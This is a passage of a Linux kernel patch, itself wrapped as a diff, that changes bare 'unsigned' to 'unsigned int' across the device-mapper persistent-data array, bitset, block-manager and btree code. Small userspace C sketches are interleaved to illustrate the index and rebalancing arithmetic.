++				       unsigned int base, unsigned int new_nr)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+ 	BUG_ON(le32_to_cpu(ab->nr_entries));
+@@ -728,7 +729,7 @@ int dm_array_new(struct dm_array_info *info, dm_block_t *root,
+ 	int r;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned block_index, end_block, size_of_block, max_entries;
++	unsigned int block_index, end_block, size_of_block, max_entries;
+ 
+ 	r = dm_array_empty(info, root);
+ 	if (r)
+@@ -776,7 +777,7 @@ int dm_array_get_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned entry, max_entries;
++	unsigned int entry, max_entries;
+ 
+ 	size_of_block = dm_bm_block_size(dm_tm_get_bm(info->btree_info.tm));
+ 	max_entries = calc_max_entries(info->value_type.size, size_of_block);
+@@ -804,8 +805,8 @@ static int array_set_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned max_entries;
+-	unsigned entry;
++	unsigned int max_entries;
++	unsigned int entry;
+ 	void *old_value;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+@@ -861,9 +862,9 @@ static int walk_ablock(void *context, uint64_t *keys, void *leaf)
+ 	struct walk_info *wi = context;
+ 
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	__le64 block_le;
+-	unsigned nr_entries, max_entries;
++	unsigned int nr_entries, max_entries;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
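
For reference, the retyped index parameters above all feed the same layout: an array block is a small header followed by tightly packed fixed-size values, so element_at() is plain pointer arithmetic. A minimal userspace sketch of that arithmetic (the struct below is an illustrative stand-in, not the on-disk format):

#include <stdint.h>
#include <stdio.h>

struct array_block_model {            /* simplified stand-in for struct array_block */
	uint32_t nr_entries;
};

/* values are packed immediately after the header, value_size bytes each */
static void *element_at_model(struct array_block_model *ab,
			      unsigned int value_size, unsigned int index)
{
	unsigned char *entry = (unsigned char *)(ab + 1);

	return entry + index * value_size;
}

int main(void)
{
	struct {
		struct array_block_model hdr;
		unsigned char values[4 * 8];   /* 4 entries of 8 bytes */
	} blk = { { 4 }, { 0 } };

	/* entry 2 starts 16 bytes into the packed value area */
	printf("%td\n", (unsigned char *)element_at_model(&blk.hdr, 8, 2) - blk.values);
	return 0;
}
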
+diff --git a/drivers/md/persistent-data/dm-array.h b/drivers/md/persistent-data/dm-array.h
+index d7d2d579c662c..b6c7077c73591 100644
+--- a/drivers/md/persistent-data/dm-array.h
++++ b/drivers/md/persistent-data/dm-array.h
+@@ -198,7 +198,7 @@ struct dm_array_cursor {
+ 
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ int dm_array_cursor_begin(struct dm_array_info *info,
+diff --git a/drivers/md/persistent-data/dm-bitset.c b/drivers/md/persistent-data/dm-bitset.c
+index b7208d82e748a..625d93498cddb 100644
+--- a/drivers/md/persistent-data/dm-bitset.c
++++ b/drivers/md/persistent-data/dm-bitset.c
+@@ -41,7 +41,7 @@ EXPORT_SYMBOL_GPL(dm_bitset_empty);
+ 
+ struct packer_context {
+ 	bit_value_fn fn;
+-	unsigned nr_bits;
++	unsigned int nr_bits;
+ 	void *context;
+ };
+ 
+@@ -49,7 +49,7 @@ static int pack_bits(uint32_t index, void *value, void *context)
+ {
+ 	int r;
+ 	struct packer_context *p = context;
+-	unsigned bit, nr = min(64u, p->nr_bits - (index * 64));
++	unsigned int bit, nr = min(64u, p->nr_bits - (index * 64));
+ 	uint64_t word = 0;
+ 	bool bv;
+ 
+@@ -147,7 +147,7 @@ static int get_array_entry(struct dm_disk_bitset *info, dm_block_t root,
+ 			   uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned array_index = index / BITS_PER_ARRAY_ENTRY;
++	unsigned int array_index = index / BITS_PER_ARRAY_ENTRY;
+ 
+ 	if (info->current_index_set) {
+ 		if (info->current_index == array_index)
+@@ -165,7 +165,7 @@ int dm_bitset_set_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		      uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -182,7 +182,7 @@ int dm_bitset_clear_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 			uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -199,7 +199,7 @@ int dm_bitset_test_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		       uint32_t index, dm_block_t *new_root, bool *result)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
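
The div/mod pair above (index / BITS_PER_ARRAY_ENTRY, index % BITS_PER_ARRAY_ENTRY) splits a bit index into an array slot and a bit within that slot. A sketch assuming 64 bits per array entry, consistent with the min(64u, ...) in pack_bits():

#include <stdint.h>
#include <stdio.h>

#define BITS_PER_ARRAY_ENTRY 64u   /* assumed from the min(64u, ...) in pack_bits() */

static void locate_bit(uint32_t index, unsigned int *array_index, unsigned int *bit)
{
	*array_index = index / BITS_PER_ARRAY_ENTRY;  /* which __le64 array entry */
	*bit = index % BITS_PER_ARRAY_ENTRY;          /* which bit inside it */
}

int main(void)
{
	unsigned int slot, bit;

	locate_bit(200, &slot, &bit);
	printf("slot=%u bit=%u\n", slot, bit);  /* slot=3 bit=8 */
	return 0;
}
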
+diff --git a/drivers/md/persistent-data/dm-block-manager.c b/drivers/md/persistent-data/dm-block-manager.c
+index 11935864f50f5..1f40100908d7c 100644
+--- a/drivers/md/persistent-data/dm-block-manager.c
++++ b/drivers/md/persistent-data/dm-block-manager.c
+@@ -57,10 +57,10 @@ struct waiter {
+ 	int wants_write;
+ };
+ 
+-static unsigned __find_holder(struct block_lock *lock,
++static unsigned int __find_holder(struct block_lock *lock,
+ 			      struct task_struct *task)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++)
+ 		if (lock->holders[i] == task)
+@@ -73,7 +73,7 @@ static unsigned __find_holder(struct block_lock *lock,
+ /* call this *after* you increment lock->count */
+ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, NULL);
++	unsigned int h = __find_holder(lock, NULL);
+ #ifdef CONFIG_DM_DEBUG_BLOCK_STACK_TRACING
+ 	struct stack_store *t;
+ #endif
+@@ -90,14 +90,14 @@ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ /* call this *before* you decrement lock->count */
+ static void __del_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, task);
++	unsigned int h = __find_holder(lock, task);
+ 	lock->holders[h] = NULL;
+ 	put_task_struct(task);
+ }
+ 
+ static int __check_holder(struct block_lock *lock)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++) {
+ 		if (lock->holders[i] == current) {
+@@ -376,8 +376,8 @@ struct dm_block_manager {
+ };
+ 
+ struct dm_block_manager *dm_block_manager_create(struct block_device *bdev,
+-						 unsigned block_size,
+-						 unsigned max_held_per_thread)
++						 unsigned int block_size,
++						 unsigned int max_held_per_thread)
+ {
+ 	int r;
+ 	struct dm_block_manager *bm;
+@@ -415,7 +415,7 @@ void dm_block_manager_destroy(struct dm_block_manager *bm)
+ }
+ EXPORT_SYMBOL_GPL(dm_block_manager_destroy);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm)
++unsigned int dm_bm_block_size(struct dm_block_manager *bm)
+ {
+ 	return dm_bufio_get_block_size(bm->bufio);
+ }
+diff --git a/drivers/md/persistent-data/dm-block-manager.h b/drivers/md/persistent-data/dm-block-manager.h
+index e728937f376a3..58a23b8ec1902 100644
+--- a/drivers/md/persistent-data/dm-block-manager.h
++++ b/drivers/md/persistent-data/dm-block-manager.h
+@@ -32,11 +32,11 @@ void *dm_block_data(struct dm_block *b);
+  */
+ struct dm_block_manager;
+ struct dm_block_manager *dm_block_manager_create(
+-	struct block_device *bdev, unsigned block_size,
+-	unsigned max_held_per_thread);
++	struct block_device *bdev, unsigned int block_size,
++	unsigned int max_held_per_thread);
+ void dm_block_manager_destroy(struct dm_block_manager *bm);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm);
++unsigned int dm_bm_block_size(struct dm_block_manager *bm);
+ dm_block_t dm_bm_nr_blocks(struct dm_block_manager *bm);
+ 
+ /*----------------------------------------------------------------*/
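
__find_holder() above is a linear scan of a small fixed table of lock holders; passing NULL finds a free slot, which is how __add_holder() claims one. A userspace model (the MAX_HOLDERS value here is illustrative, the real one lives in dm-block-manager.c):

#include <assert.h>
#include <stddef.h>

#define MAX_HOLDERS 4

struct task;   /* opaque stand-in for task_struct */

static unsigned int find_holder(struct task *holders[MAX_HOLDERS], struct task *task)
{
	unsigned int i;

	for (i = 0; i < MAX_HOLDERS; i++)
		if (holders[i] == task)
			break;

	assert(i < MAX_HOLDERS);   /* the kernel traps here instead */
	return i;
}

int main(void)
{
	struct task *holders[MAX_HOLDERS] = { 0 };

	/* a NULL search finds the first free slot, as __add_holder() relies on */
	return (int)find_holder(holders, NULL);   /* 0 */
}
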
+diff --git a/drivers/md/persistent-data/dm-btree-remove.c b/drivers/md/persistent-data/dm-btree-remove.c
+index 4ead31e0d8ce5..ac213138b0217 100644
+--- a/drivers/md/persistent-data/dm-btree-remove.c
++++ b/drivers/md/persistent-data/dm-btree-remove.c
+@@ -124,10 +124,10 @@ static int node_copy(struct btree_node *left, struct btree_node *right, int shif
+ /*
+  * Delete a specific entry from a leaf node.
+  */
+-static void delete_at(struct btree_node *n, unsigned index)
++static void delete_at(struct btree_node *n, unsigned int index)
+ {
+-	unsigned nr_entries = le32_to_cpu(n->header.nr_entries);
+-	unsigned nr_to_copy = nr_entries - (index + 1);
++	unsigned int nr_entries = le32_to_cpu(n->header.nr_entries);
++	unsigned int nr_to_copy = nr_entries - (index + 1);
+ 	uint32_t value_size = le32_to_cpu(n->header.value_size);
+ 	BUG_ON(index >= nr_entries);
+ 
+@@ -144,20 +144,20 @@ static void delete_at(struct btree_node *n, unsigned index)
+ 	n->header.nr_entries = cpu_to_le32(nr_entries - 1);
+ }
+ 
+-static unsigned merge_threshold(struct btree_node *n)
++static unsigned int merge_threshold(struct btree_node *n)
+ {
+ 	return le32_to_cpu(n->header.max_entries) / 3;
+ }
+ 
+ struct child {
+-	unsigned index;
++	unsigned int index;
+ 	struct dm_block *block;
+ 	struct btree_node *n;
+ };
+ 
+ static int init_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+ 		      struct btree_node *parent,
+-		      unsigned index, struct child *result)
++		      unsigned int index, struct child *result)
+ {
+ 	int r, inc;
+ 	dm_block_t root;
+@@ -263,7 +263,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ 		/*
+ 		 * Rebalance.
+ 		 */
+-		unsigned target_left = (nr_left + nr_right) / 2;
++		unsigned int target_left = (nr_left + nr_right) / 2;
+ 		ret = shift(left, right, nr_left - target_left);
+ 		if (ret)
+ 			return ret;
+@@ -273,7 +273,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance2(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent;
+@@ -310,7 +310,7 @@ static int delete_center_node(struct dm_btree_info *info, struct btree_node *par
+ 			      uint32_t nr_left, uint32_t nr_center, uint32_t nr_right)
+ {
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned shift = min(max_entries - nr_left, nr_center);
++	unsigned int shift = min(max_entries - nr_left, nr_center);
+ 
+ 	if (nr_left + shift > max_entries) {
+ 		DMERR("node shift out of bounds");
+@@ -351,10 +351,10 @@ static int redistribute3(struct dm_btree_info *info, struct btree_node *parent,
+ {
+ 	int s, ret;
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned total = nr_left + nr_center + nr_right;
+-	unsigned target_right = total / 3;
+-	unsigned remainder = (target_right * 3) != total;
+-	unsigned target_left = target_right + remainder;
++	unsigned int total = nr_left + nr_center + nr_right;
++	unsigned int target_right = total / 3;
++	unsigned int remainder = (target_right * 3) != total;
++	unsigned int target_left = target_right + remainder;
+ 
+ 	BUG_ON(target_left > max_entries);
+ 	BUG_ON(target_right > max_entries);
+@@ -422,7 +422,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ 	uint32_t nr_center = le32_to_cpu(center->header.nr_entries);
+ 	uint32_t nr_right = le32_to_cpu(right->header.nr_entries);
+ 
+-	unsigned threshold = merge_threshold(left) * 4 + 1;
++	unsigned int threshold = merge_threshold(left) * 4 + 1;
+ 
+ 	if ((left->header.max_entries != center->header.max_entries) ||
+ 	    (center->header.max_entries != right->header.max_entries)) {
+@@ -440,7 +440,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance3(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_current(s));
+@@ -519,7 +519,7 @@ static int rebalance_children(struct shadow_spine *s,
+ 	return r;
+ }
+ 
+-static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
++static int do_leaf(struct btree_node *n, uint64_t key, unsigned int *index)
+ {
+ 	int i = lower_bound(n, key);
+ 
+@@ -539,7 +539,7 @@ static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
+  */
+ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ 		      struct dm_btree_value_type *vt, dm_block_t root,
+-		      uint64_t key, unsigned *index)
++		      uint64_t key, unsigned int *index)
+ {
+ 	int i = *index, r;
+ 	struct btree_node *n;
+@@ -589,7 +589,7 @@ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, dm_block_t *new_root)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -601,7 +601,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		r = remove_raw(&spine, info,
+ 			       (level == last_level ?
+ 				&info->value_type : &le64_vt),
+-			       root, keys[level], (unsigned *)&index);
++			       root, keys[level], (unsigned int *)&index);
+ 		if (r < 0)
+ 			break;
+ 
+@@ -685,9 +685,9 @@ static int remove_nearest(struct shadow_spine *s, struct dm_btree_info *info,
+ 
+ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 		      uint64_t *keys, uint64_t end_key,
+-		      dm_block_t *new_root, unsigned *nr_removed)
++		      dm_block_t *new_root, unsigned int *nr_removed)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -698,7 +698,7 @@ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 	init_shadow_spine(&spine, info);
+ 	for (level = 0; level < last_level; level++) {
+ 		r = remove_raw(&spine, info, &le64_vt,
+-			       root, keys[level], (unsigned *) &index);
++			       root, keys[level], (unsigned int *) &index);
+ 		if (r < 0)
+ 			goto out;
+ 
+@@ -742,7 +742,7 @@ out:
+ 
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *first_key, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed)
++			   dm_block_t *new_root, unsigned int *nr_removed)
+ {
+ 	int r;
+ 
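
The redistribute3() targets above split the surviving entries three ways, biasing any remainder toward the left node. The same arithmetic in a standalone sketch:

#include <stdio.h>

/* mirror of the target arithmetic shown in the redistribute3 hunk:
 * entries split three ways, remainder biased to the left node
 */
static void targets3(unsigned int nr_left, unsigned int nr_center,
		     unsigned int nr_right)
{
	unsigned int total = nr_left + nr_center + nr_right;
	unsigned int target_right = total / 3;
	unsigned int remainder = (target_right * 3) != total;
	unsigned int target_left = target_right + remainder;

	printf("%u -> left=%u right=%u center=%u\n", total, target_left,
	       target_right, total - target_left - target_right);
}

int main(void)
{
	targets3(10, 0, 10);   /* 20 -> left=7 right=6 center=7 */
	return 0;
}
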
+diff --git a/drivers/md/persistent-data/dm-btree-spine.c b/drivers/md/persistent-data/dm-btree-spine.c
+index e653458888a7c..45a39d4f1c10f 100644
+--- a/drivers/md/persistent-data/dm-btree-spine.c
++++ b/drivers/md/persistent-data/dm-btree-spine.c
+@@ -234,12 +234,12 @@ dm_block_t shadow_root(struct shadow_spine *s)
+ 	return s->root;
+ }
+ 
+-static void le64_inc(void *context, const void *value_le, unsigned count)
++static void le64_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_inc_range);
+ }
+ 
+-static void le64_dec(void *context, const void *value_le, unsigned count)
++static void le64_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_dec_range);
+ }
+diff --git a/drivers/md/persistent-data/dm-btree.c b/drivers/md/persistent-data/dm-btree.c
+index 5ce64e93aae74..1cc783d7030d8 100644
+--- a/drivers/md/persistent-data/dm-btree.c
++++ b/drivers/md/persistent-data/dm-btree.c
+@@ -23,8 +23,8 @@ static void memcpy_disk(void *dest, const void *src, size_t len)
+ 	__dm_unbless_for_disk(src);
+ }
+ 
+-static void array_insert(void *base, size_t elt_size, unsigned nr_elts,
+-			 unsigned index, void *elt)
++static void array_insert(void *base, size_t elt_size, unsigned int nr_elts,
++			 unsigned int index, void *elt)
+ 	__dm_written_to_disk(elt)
+ {
+ 	if (index < nr_elts)
+@@ -80,7 +80,7 @@ void inc_children(struct dm_transaction_manager *tm, struct btree_node *n,
+ 		vt->inc(vt->context, value_ptr(n, 0), nr_entries);
+ }
+ 
+-static int insert_at(size_t value_size, struct btree_node *node, unsigned index,
++static int insert_at(size_t value_size, struct btree_node *node, unsigned int index,
+ 		     uint64_t key, void *value)
+ 	__dm_written_to_disk(value)
+ {
+@@ -162,9 +162,9 @@ EXPORT_SYMBOL_GPL(dm_btree_empty);
+ struct frame {
+ 	struct dm_block *b;
+ 	struct btree_node *n;
+-	unsigned level;
+-	unsigned nr_children;
+-	unsigned current_child;
++	unsigned int level;
++	unsigned int nr_children;
++	unsigned int current_child;
+ };
+ 
+ struct del_stack {
+@@ -193,7 +193,7 @@ static int unprocessed_frames(struct del_stack *s)
+ 
+ static void prefetch_children(struct del_stack *s, struct frame *f)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block_manager *bm = dm_tm_get_bm(s->tm);
+ 
+ 	for (i = 0; i < f->nr_children; i++)
+@@ -205,7 +205,7 @@ static bool is_internal_level(struct dm_btree_info *info, struct frame *f)
+ 	return f->level < (info->levels - 1);
+ }
+ 
+-static int push_frame(struct del_stack *s, dm_block_t b, unsigned level)
++static int push_frame(struct del_stack *s, dm_block_t b, unsigned int level)
+ {
+ 	int r;
+ 	uint32_t ref_count;
+@@ -371,7 +371,7 @@ static int btree_lookup_raw(struct ro_spine *s, dm_block_t block, uint64_t key,
+ int dm_btree_lookup(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, void *value_le)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int r = -ENODATA;
+ 	uint64_t rkey;
+ 	__le64 internal_value_le;
+@@ -467,7 +467,7 @@ out:
+ int dm_btree_lookup_next(struct dm_btree_info *info, dm_block_t root,
+ 			 uint64_t *keys, uint64_t *rkey, void *value_le)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	int r = -ENODATA;
+ 	__le64 internal_value_le;
+ 	struct ro_spine spine;
+@@ -502,9 +502,9 @@ EXPORT_SYMBOL_GPL(dm_btree_lookup_next);
+  * Copies entries from one region of a btree node to another.  The regions
+  * must not overlap.
+  */
+-static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void copy_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memcpy(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -515,9 +515,9 @@ static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+  * Moves entries from one region of a btree node to another.  The regions
+  * may overlap.
+  */
+-static void move_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void move_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memmove(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -528,7 +528,7 @@ static void move_entries(struct btree_node *dest, unsigned dest_offset,
+  * Erases the first 'count' entries of a btree node, shifting following
+  * entries down into their place.
+  */
+-static void shift_down(struct btree_node *n, unsigned count)
++static void shift_down(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, 0, n, count, le32_to_cpu(n->header.nr_entries) - count);
+ }
+@@ -537,7 +537,7 @@ static void shift_down(struct btree_node *n, unsigned count)
+  * Moves entries in a btree node up 'count' places, making space for
+  * new entries at the start of the node.
+  */
+-static void shift_up(struct btree_node *n, unsigned count)
++static void shift_up(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, count, n, 0, le32_to_cpu(n->header.nr_entries));
+ }
+@@ -548,18 +548,18 @@ static void shift_up(struct btree_node *n, unsigned count)
+  */
+ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total = nr_left + nr_right;
+-	unsigned target_left = total / 2;
+-	unsigned target_right = total - target_left;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total = nr_left + nr_right;
++	unsigned int target_left = total / 2;
++	unsigned int target_right = total - target_left;
+ 
+ 	if (nr_left < target_left) {
+-		unsigned delta = target_left - nr_left;
++		unsigned int delta = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, delta);
+ 		shift_down(right, delta);
+ 	} else if (nr_left > target_left) {
+-		unsigned delta = nr_left - target_left;
++		unsigned int delta = nr_left - target_left;
+ 		if (nr_right)
+ 			shift_up(right, delta);
+ 		copy_entries(right, 0, left, target_left, delta);
+@@ -576,10 +576,10 @@ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 			  struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_center = le32_to_cpu(center->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total, target_left, target_center, target_right;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_center = le32_to_cpu(center->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total, target_left, target_center, target_right;
+ 
+ 	BUG_ON(nr_center);
+ 
+@@ -589,19 +589,19 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 	target_right = (total - target_left - target_center);
+ 
+ 	if (nr_left < target_left) {
+-		unsigned left_short = target_left - nr_left;
++		unsigned int left_short = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, left_short);
+ 		copy_entries(center, 0, right, left_short, target_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else if (nr_left < (target_left + target_center)) {
+-		unsigned left_to_center = nr_left - target_left;
++		unsigned int left_to_center = nr_left - target_left;
+ 		copy_entries(center, 0, left, target_left, left_to_center);
+ 		copy_entries(center, left_to_center, right, 0, target_center - left_to_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else {
+-		unsigned right_short = target_right - nr_right;
++		unsigned int right_short = target_right - nr_right;
+ 		shift_up(right, right_short);
+ 		copy_entries(right, 0, left, nr_left - right_short, right_short);
+ 		copy_entries(center, 0, left, target_left, nr_left - target_left);
+@@ -642,7 +642,7 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+  *
+  * Where A* is a shadow of A.
+  */
+-static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
++static int split_one_into_two(struct shadow_spine *s, unsigned int parent_index,
+ 			      struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+@@ -696,7 +696,7 @@ static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
+  * to the new shadow.
+  */
+ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+-			struct btree_node *parent, unsigned index,
++			struct btree_node *parent, unsigned int index,
+ 			struct dm_block **result)
+ {
+ 	int r, inc;
+@@ -725,11 +725,11 @@ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *
+  * Splits two nodes into three.  This is more work, but results in fuller
+  * nodes, so saves metadata space.
+  */
+-static int split_two_into_three(struct shadow_spine *s, unsigned parent_index,
++static int split_two_into_three(struct shadow_spine *s, unsigned int parent_index,
+                                 struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+-	unsigned middle_index;
++	unsigned int middle_index;
+ 	struct dm_block *left, *middle, *right, *parent;
+ 	struct btree_node *ln, *rn, *mn, *pn;
+ 	__le64 location;
+@@ -830,7 +830,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+ {
+ 	int r;
+ 	size_t size;
+-	unsigned nr_left, nr_right;
++	unsigned int nr_left, nr_right;
+ 	struct dm_block *left, *right, *new_parent;
+ 	struct btree_node *pn, *ln, *rn;
+ 	__le64 val;
+@@ -904,7 +904,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+  * Redistributes a node's entries with its left sibling.
+  */
+ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			  unsigned parent_index, uint64_t key)
++			  unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -933,7 +933,7 @@ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt
+  * Redistributes a node's entries with its right sibling.
+  */
+ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			   unsigned parent_index, uint64_t key)
++			   unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -961,10 +961,10 @@ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *v
+ /*
+  * Returns the number of spare entries in a node.
+  */
+-static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned *space)
++static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned int *space)
+ {
+ 	int r;
+-	unsigned nr_entries;
++	unsigned int nr_entries;
+ 	struct dm_block *block;
+ 	struct btree_node *node;
+ 
+@@ -990,12 +990,12 @@ static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigne
+  */
+ #define SPACE_THRESHOLD 8
+ static int rebalance_or_split(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			      unsigned parent_index, uint64_t key)
++			      unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_parent(s));
+-	unsigned nr_parent = le32_to_cpu(parent->header.nr_entries);
+-	unsigned free_space;
++	unsigned int nr_parent = le32_to_cpu(parent->header.nr_entries);
++	unsigned int free_space;
+ 	int left_shared = 0, right_shared = 0;
+ 
+ 	/* Should we move entries to the left sibling? */
+@@ -1080,7 +1080,7 @@ static bool has_space_for_insert(struct btree_node *node, uint64_t key)
+ 
+ static int btree_insert_raw(struct shadow_spine *s, dm_block_t root,
+ 			    struct dm_btree_value_type *vt,
+-			    uint64_t key, unsigned *index)
++			    uint64_t key, unsigned int *index)
+ {
+ 	int r, i = *index, top = 1;
+ 	struct btree_node *node;
+@@ -1214,7 +1214,7 @@ int btree_get_overwrite_leaf(struct dm_btree_info *info, dm_block_t root,
+ }
+ 
+ static bool need_insert(struct btree_node *node, uint64_t *keys,
+-			unsigned level, unsigned index)
++			unsigned int level, unsigned int index)
+ {
+         return ((index >= le32_to_cpu(node->header.nr_entries)) ||
+ 		(le64_to_cpu(node->keys[index]) != keys[level]));
+@@ -1226,7 +1226,7 @@ static int insert(struct dm_btree_info *info, dm_block_t root,
+ 		  __dm_written_to_disk(value)
+ {
+ 	int r;
+-	unsigned level, index = -1, last_level = info->levels - 1;
++	unsigned int level, index = -1, last_level = info->levels - 1;
+ 	dm_block_t block = root;
